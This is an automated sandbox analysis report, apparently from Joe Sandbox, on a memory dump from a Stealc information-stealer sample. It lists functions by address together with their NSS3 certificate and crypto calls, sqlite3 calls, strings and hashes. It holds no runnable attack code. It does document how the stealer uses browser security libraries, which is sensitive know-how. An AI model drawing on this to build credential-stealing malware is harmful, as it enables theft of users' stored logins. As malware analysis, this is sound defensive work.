Instruction Fuzzy Hash: 11414BB5904205ABEB209F68ED4196A77B8FF95219F084930EC18D7B12FB31E924C7D1

Function 6C892E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C892CDA,?,00000000), ref: 6C892E1E

Part of subcall function 6C8EFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C899003,?), ref: 6C8EFD91
Part of subcall function 6C8EFD80: PORT_Alloc_Util.NSS3(A4686C8F,?), ref: 6C8EFDA2
Part of subcall function 6C8EFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C8F,?,?), ref: 6C8EFDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C892E33

Part of subcall function 6C8EFD80: free.MOZGLUE(00000000,?,?), ref: 6C8EFDD1

TlsGetValue.KERNEL32 ref: 6C892E4E
EnterCriticalSection.KERNEL32(?), ref: 6C892E5E
PL_HashTableLookup.NSS3(?), ref: 6C892E71
PL_HashTableRemove.NSS3(?), ref: 6C892E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6C892E96
PR_Unlock.NSS3 ref: 6C892EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C892EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C892EC5

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: f56045a7fbb266f3e19f3573ed59b39d469b5c2893fa11c58f776c89865d206b
Instruction ID: ab0d7018741af317a1504fa374fb88e6a238a07c166d98af826c5e385f425c25
Opcode Fuzzy Hash: f56045a7fbb266f3e19f3573ed59b39d469b5c2893fa11c58f776c89865d206b
Instruction Fuzzy Hash: ED21F572E04145A7EF216A2CFD49A9E3A74EBA220DF180830ED2886712F732D558D6A1

Function 6C87FC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C87FD18
sqlite3_initialize.NSS3 ref: 6C87FD5F
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C87FD89
memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C87FD99
sqlite3_free.NSS3(00000000), ref: 6C87FE3C
sqlite3_free.NSS3(?), ref: 6C87FEE3
sqlite3_free.NSS3(?), ref: 6C87FEEE

Strings

simple, xrefs: 6C87FC79

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: sqlite3_free$sqlite3_initialize$memcpymemset
String ID: simple
API String ID: 1130978851-3246079234
Opcode ID: b6a24881dcd0ebc020bc7e184a3f7bf42d89a2503f34f08395095e8fff634b93
Instruction ID: 12b28cc5e1063da6c98d9d857be2e6db04b77e409033a72411c1f0ada5be83e0
Opcode Fuzzy Hash: b6a24881dcd0ebc020bc7e184a3f7bf42d89a2503f34f08395095e8fff634b93
Instruction Fuzzy Hash: D0916471A052058FDB24CF5ACA80A6EBBF1FF95318F25C968D8199B751E731E841CB60

Function 6C885CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C885EC9
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C885EED

Strings

%s at line %d of [%.10s], xrefs: 6C885EE0
unable to close due to unfinalized statements or unfinished backups, xrefs: 6C885E64
misuse, xrefs: 6C885EDB
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C885ED1
API call with %s database connection pointer, xrefs: 6C885EC3
invalid, xrefs: 6C885EBE

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
API String ID: 632333372-1982981357
Opcode ID: 06639c019bc9d2a593c4e9af280a988a420a339c22af0634d8ce77276fe88ff5
Instruction ID: 6eab5f6c1b0f9586a27bab203dae4d78776d03f974d0191e0a689b5f33ba5fbf
Opcode Fuzzy Hash: 06639c019bc9d2a593c4e9af280a988a420a339c22af0634d8ce77276fe88ff5
Instruction Fuzzy Hash: F8819F30B077169BFB298E19CA48B6A77B0BF41309F284A69D8175BF51D730E842CBD1

Function 6C86DCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C86DDF9
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C86DE68
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C86DE97
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C86DEB6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C86DF78

Strings

%s at line %d of [%.10s], xrefs: 6C86DE61, 6C86DE90
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C86DE52, 6C86DE81
database corruption, xrefs: 6C86DE5C, 6C86DE8B

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1526119172-598938438
Opcode ID: 99ab2e79603c6fc9cc16cee3a7edcf97f24a5af0f7045ec864a6cd2a15f9ce5a
Instruction ID: c0ea344993871393ca51edf92b3d7343b4eec9602e36adf176038133e77a5ac3
Opcode Fuzzy Hash: 99ab2e79603c6fc9cc16cee3a7edcf97f24a5af0f7045ec864a6cd2a15f9ce5a
Instruction Fuzzy Hash: 5481B4717043019FD724DF26C580B6A77F1AF85309F258C2EE99A8BE91E731E845C752

Function 6C81CEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C81B999), ref: 6C81CFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C81B999), ref: 6C81D02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C81B999), ref: 6C81D041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C81B999), ref: 6C96972B

Strings

%s at line %d of [%.10s], xrefs: 6C81CFEC, 6C81D018, 6C81D029, 6C81D03F, 6C96978B
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C81CFDD, 6C81D00E, 6C81D022, 6C81D033, 6C969780
database corruption, xrefs: 6C81CFE7, 6C81D013, 6C81D028, 6C81D039, 6C81D03E, 6C969786

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: ab469917ca6caf5b067c121833482c7567490ebc25f2ad22c52317a4c53adfd7
Instruction ID: 6ebf2967e161234ba44fdf03cac6bb4f4ac1c18ef3f9223846d86c8687f4f4bf
Opcode Fuzzy Hash: ab469917ca6caf5b067c121833482c7567490ebc25f2ad22c52317a4c53adfd7
Instruction Fuzzy Hash: 69616A71A042208BD320CF29C940BA6B7F5EF95318F69856DE4489FF82D376D847C7A2

Function 6C8DCC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6C8DCD08
PK11_DoesMechanism.NSS3(?,?), ref: 6C8DCE16
PR_SetError.NSS3(00000000,00000000), ref: 6C8DD079

Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: cf32c442cc281c1d326a486172b0a35455d341be4066bb1b225a50d87227f3f0
Instruction ID: ea760a225c81856fff71528361a7a6052f7c6e623136710a1ac348f5cec115e6
Opcode Fuzzy Hash: cf32c442cc281c1d326a486172b0a35455d341be4066bb1b225a50d87227f3f0
Instruction Fuzzy Hash: FAC1CFB1A002199BDB20DF28CD80BDAB7B4BF48318F1545A9E84CA7741E775EE95CF90

Function 6C8CDC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6C8D97C1,?,00000000,00000000,?,?,?,00000000,?,6C8B7F4A,00000000), ref: 6C8CDC68

Part of subcall function 6C8F0BE0: malloc.MOZGLUE(6C8E8D2D,?,00000000,?), ref: 6C8F0BF8
Part of subcall function 6C8F0BE0: TlsGetValue.KERNEL32(6C8E8D2D,?,00000000,?), ref: 6C8F0C15

PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6C8B7F4A,00000000,?,00000000,00000000), ref: 6C8CDD36
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C8B7F4A,00000000,?,00000000,00000000), ref: 6C8CDE2D
memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6C8B7F4A,00000000,?,00000000,00000000), ref: 6C8CDE43
PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6C8B7F4A,00000000,?,00000000,00000000), ref: 6C8CDE76
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C8B7F4A,00000000,?,00000000,00000000), ref: 6C8CDF32
memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6C8B7F4A,00000000,?,00000000,00000000), ref: 6C8CDF5F
PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6C8B7F4A,00000000,?,00000000,00000000), ref: 6C8CDF78
PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6C8B7F4A,00000000,?,00000000,00000000), ref: 6C8CDFAA

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Alloc_Util$memcpy$Valuemalloc
String ID:
API String ID: 1886645929-0
Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction ID: 501c73b48678fab200017f4554d692e14cb46f91a5c52b06f83654b1abc7bb61
Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction Fuzzy Hash: C581C5B0BC66048BFB346B19CA9035972D2EB60748F208C3BE919CAFE1E774C484C653

Function 6C8A3C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_GetCertFromPrivateKey.NSS3(?), ref: 6C8A3C76
CERT_DestroyCertificate.NSS3(00000000), ref: 6C8A3C94

Part of subcall function 6C8995B0: TlsGetValue.KERNEL32(00000000,?,6C8B00D2,00000000), ref: 6C8995D2
Part of subcall function 6C8995B0: EnterCriticalSection.KERNEL32(?,?,?,6C8B00D2,00000000), ref: 6C8995E7
Part of subcall function 6C8995B0: PR_Unlock.NSS3(?,?,?,?,6C8B00D2,00000000), ref: 6C899605

PORT_NewArena_Util.NSS3(00000800), ref: 6C8A3CB2
PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C8A3CCA
memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6C8A3CE1

Part of subcall function 6C8A3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8BAE42), ref: 6C8A30AA
Part of subcall function 6C8A3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C8A30C7
Part of subcall function 6C8A3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C8A30E5
Part of subcall function 6C8A3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C8A3116
Part of subcall function 6C8A3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C8A312B
Part of subcall function 6C8A3090: PK11_DestroyObject.NSS3(?,?), ref: 6C8A3154
Part of subcall function 6C8A3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8A317E

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
String ID:
API String ID: 3167935723-0
Opcode ID: f399988df8bac36aa3d6ef30bd6d5fee8e521b3589bb1051690f0e24e5967d2d
Instruction ID: e7016d52828b7551a20cd67cff1406984a7d9bb3a3038c4fb768881c84d23c16
Opcode Fuzzy Hash: f399988df8bac36aa3d6ef30bd6d5fee8e521b3589bb1051690f0e24e5967d2d
Instruction Fuzzy Hash: 3861D9B1A00200BBEB305EA5DE41FA776B9EF14748F094838FD059AA52F731DD25C7A1

Function 6C8E3D40 Relevance: 13.7, APIs: 9, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 6C8E3440: PK11_GetAllTokens.NSS3 ref: 6C8E3481
Part of subcall function 6C8E3440: PR_SetError.NSS3(00000000,00000000), ref: 6C8E34A3
Part of subcall function 6C8E3440: TlsGetValue.KERNEL32 ref: 6C8E352E
Part of subcall function 6C8E3440: EnterCriticalSection.KERNEL32(?), ref: 6C8E3542
Part of subcall function 6C8E3440: PR_Unlock.NSS3(?), ref: 6C8E355B

TlsGetValue.KERNEL32 ref: 6C8E3D8B
EnterCriticalSection.KERNEL32(?), ref: 6C8E3D9F
PR_Unlock.NSS3(?), ref: 6C8E3DCA
PR_SetError.NSS3(00000000,00000000), ref: 6C8E3DE2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C8E3E4F

Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF

TlsGetValue.KERNEL32 ref: 6C8E3E97
EnterCriticalSection.KERNEL32(?), ref: 6C8E3EAB
PR_Unlock.NSS3(?), ref: 6C8E3ED6
PR_SetError.NSS3(00000000,00000000), ref: 6C8E3EEE

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
String ID:
API String ID: 2554137219-0
Opcode ID: 7de5fd5cef1365f19367100cbdd872cf4928cbc8712437ef9655430e7ac6cbee
Instruction ID: 6efa3091cefe9f2326e7d23b63c19bf8e4dfab275c35c92dd7480980c2284d87
Opcode Fuzzy Hash: 7de5fd5cef1365f19367100cbdd872cf4928cbc8712437ef9655430e7ac6cbee
Instruction Fuzzy Hash: B9515975A046029FDB21AF28DE4476A73B0EF5A318F140928DE1957F21EB31ED54CBD1

Function 6C892C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(55252F9C), ref: 6C892C5D

Part of subcall function 6C8F0D30: calloc.MOZGLUE ref: 6C8F0D50
Part of subcall function 6C8F0D30: TlsGetValue.KERNEL32 ref: 6C8F0D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C892C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C892CE0

Part of subcall function 6C892E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C892CDA,?,00000000), ref: 6C892E1E
Part of subcall function 6C892E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C892E33
Part of subcall function 6C892E00: TlsGetValue.KERNEL32 ref: 6C892E4E
Part of subcall function 6C892E00: EnterCriticalSection.KERNEL32(?), ref: 6C892E5E
Part of subcall function 6C892E00: PL_HashTableLookup.NSS3(?), ref: 6C892E71
Part of subcall function 6C892E00: PL_HashTableRemove.NSS3(?), ref: 6C892E84
Part of subcall function 6C892E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C892E96
Part of subcall function 6C892E00: PR_Unlock.NSS3 ref: 6C892EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C892D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6C892D30
CERT_MakeCANickname.NSS3(00000001), ref: 6C892D3F
free.MOZGLUE(00000000), ref: 6C892D73
CERT_DestroyCertificate.NSS3(?), ref: 6C892DB8
free.MOZGLUE ref: 6C892DC8

Part of subcall function 6C893E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C893EC2
Part of subcall function 6C893E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C893ED6
Part of subcall function 6C893E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C893EEE
Part of subcall function 6C893E60: PR_CallOnce.NSS3(6C9F2AA4,6C8F12D0), ref: 6C893F02
Part of subcall function 6C893E60: PL_FreeArenaPool.NSS3 ref: 6C893F14
Part of subcall function 6C893E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C893F27

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: 69ba69283fef69c2c09bde273057d8194a44f1c4438c5de41b5fc24d946fe309
Instruction ID: 23111557b9482eec2aadb636c7892728572420ac66583d1be9eefb3a62be92c7
Opcode Fuzzy Hash: 69ba69283fef69c2c09bde273057d8194a44f1c4438c5de41b5fc24d946fe309
Instruction Fuzzy Hash: 7751EE71A052199FEB20DF2CDE88B5B77E5EF94349F150938E85983A20E735E8148B92

Function 6C897CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C8940D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C893F7F,?,00000055,?,?,6C891666,?,?), ref: 6C8940D9
Part of subcall function 6C8940D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C891666,?,?), ref: 6C8940FC
Part of subcall function 6C8940D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C891666,?,?), ref: 6C894138

PR_GetCurrentThread.NSS3 ref: 6C897CFD

Part of subcall function 6C959BF0: TlsGetValue.KERNEL32(?,?,?,6C9A0A75), ref: 6C959C07

SECITEM_ItemsAreEqual_Util.NSS3(?,6C9B9030), ref: 6C897D1B

Part of subcall function 6C8EFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C891A3E,00000048,00000054), ref: 6C8EFD56

SECITEM_ItemsAreEqual_Util.NSS3(?,6C9B9048), ref: 6C897D2F
SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6C897D50
PR_GetCurrentThread.NSS3 ref: 6C897D61
PORT_ArenaMark_Util.NSS3(?), ref: 6C897D7D
free.MOZGLUE(?), ref: 6C897D9C
CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6C897DB8
PR_SetError.NSS3(FFFFE023,00000000), ref: 6C897E19

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

